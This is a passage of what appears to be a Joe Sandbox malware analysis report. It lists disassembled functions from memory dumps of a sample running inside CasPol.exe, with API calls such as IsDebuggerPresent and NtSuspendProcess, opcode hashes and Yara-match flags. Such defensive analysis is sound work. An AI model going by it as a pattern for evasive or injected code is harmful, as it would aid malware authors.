                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4212172061-0
                                                                                                                                                                                                                                  • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                                                                                                                  • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                                                                                                                                                  Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$FirstH_prologNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 301083792-0
                                                                                                                                                                                                                                  • Opcode ID: 8170f0a72d00964befc2a0b1f28f9fe0a6cb8ce36f51d122916a28cfcbcc958f
                                                                                                                                                                                                                                  • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8170f0a72d00964befc2a0b1f28f9fe0a6cb8ce36f51d122916a28cfcbcc958f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                                                                                                                                                  Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2829624132-0
                                                                                                                                                                                                                                  • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                                                                                                                                  • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                                                                                                                                                  Function 045760E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 045761DA
                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 045761E4
                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 045761F1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                  • Opcode ID: 7624262ef9394642279f706339d194f5e0c01008546c7a58106dbaf3b077a978
                                                                                                                                                                                                                                  • Instruction ID: 118c36171a3fff8b800fe3725dab590abf04b730f2723f40d212ec9283e137dc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7624262ef9394642279f706339d194f5e0c01008546c7a58106dbaf3b077a978
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6231E77490121DABDB21DF25E988B9DBBB8FF48310F5041EAE81CA7250E734AF859F45
                                                                                                                                                                                                                                  Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0043A755
                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0043A75F
                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0043A76C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                  • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                                                                  • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                                                                                                                                                  Function 1000D8D1 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,1000A5B7), ref: 1000D9C9
                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,1000A5B7), ref: 1000D9D3
                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(00000016,?,?,?,?,?,1000A5B7), ref: 1000D9E0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                  • Opcode ID: 9bf7030b23631355155973f3d1f9ef44914879ac124dcb0aa0168419693e3d91
                                                                                                                                                                                                                                  • Instruction ID: 51d1529bf31c0dc1c591431ddb3d5b02b18bfdacfd507d32cf509de15b3658bd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bf7030b23631355155973f3d1f9ef44914879ac124dcb0aa0168419693e3d91
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1831B47590122DABDB21DF64D889B8DBBB4EF08350F5042EAE41CA7261EB309B858F55
                                                                                                                                                                                                                                  Function 04574AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,04574A8A,?,04582238,0000000C,04574BBD,00000000,00000000,00000001,04572082,04582108,0000000C,04571F3A,?), ref: 04574AD5
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,04574A8A,?,04582238,0000000C,04574BBD,00000000,00000000,00000001,04572082,04582108,0000000C,04571F3A,?), ref: 04574ADC
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 04574AEE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 4345df17f3f3b285c9f73315482c9f88e3557dd5aee36937e7afc74fc5825ac2
                                                                                                                                                                                                                                  • Instruction ID: cb5e3cbbca3c792da0e7e7647e1342e646eed1994815cdd603de48db86b93907
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4345df17f3f3b285c9f73315482c9f88e3557dd5aee36937e7afc74fc5825ac2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FE0B636000619AFDF116F65FD09A493B7AFF82355B108034F9098B121EB3AED4AEA54
                                                                                                                                                                                                                                  Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                                                                  • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                                                                                                                                                  Function 10014BBC Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002,00000000), ref: 10014BDD
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002,00000000), ref: 10014BE4
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 10014BF6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 95c76ed56e18f89149474fb52f601925ff153df3b73455ff02c6b642b124ee7d
                                                                                                                                                                                                                                  • Instruction ID: deeea49242b6951bce6ccf9b122a28d0d79a9096b4b5a126c2a511b2d40dffe6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95c76ed56e18f89149474fb52f601925ff153df3b73455ff02c6b642b124ee7d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFE0BF35004154FFDB01AF54CD99E483B69FB44291B114014F9055A132CF35ED93DA90
                                                                                                                                                                                                                                  Function 0041ACC1 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                                                                                                                                                                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1999457699-0
                                                                                                                                                                                                                                  • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                                                                  • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                                                                                                                                                                                                  Function 0041ACED Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                                                                                                                                                                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3614150671-0
                                                                                                                                                                                                                                  • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                                                                  • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                                                                                                                                                                                                  Function 04576580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                                                  • Opcode ID: dc019d3839afe817ef14266546102a7d8419a999f5a14729737600e3da04615a
                                                                                                                                                                                                                                  • Instruction ID: e06f43740d574de246163a0288b6bedeb649657e7ec180becde07661268fdc22
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc019d3839afe817ef14266546102a7d8419a999f5a14729737600e3da04615a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32314871900509AFDB249E38EC84EFA7BBDFB85324F4401BCE818D7251E630A945EB50
                                                                                                                                                                                                                                  Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                                                  • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                                                                                                                  • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                                                                                                                                                  Function 10018AD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                                                  • Opcode ID: 873a04302784b116d8a99258add1453e79be975c542385aca68e1d7541cdf5be
                                                                                                                                                                                                                                  • Instruction ID: c16af5c7ffbd8c4a49c204f9905b3b3e1e252fc171b94e42c608c02adf969b32
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 873a04302784b116d8a99258add1453e79be975c542385aca68e1d7541cdf5be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D131F4B1904249ABDB14CE78CC84EEB7BBDDF86354F1402A9F519DB251E630EF858B50
                                                                                                                                                                                                                                  Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                  • String ID: <D
                                                                                                                                                                                                                                  • API String ID: 1084509184-3866323178
                                                                                                                                                                                                                                  • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                                                                                                                                                  • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
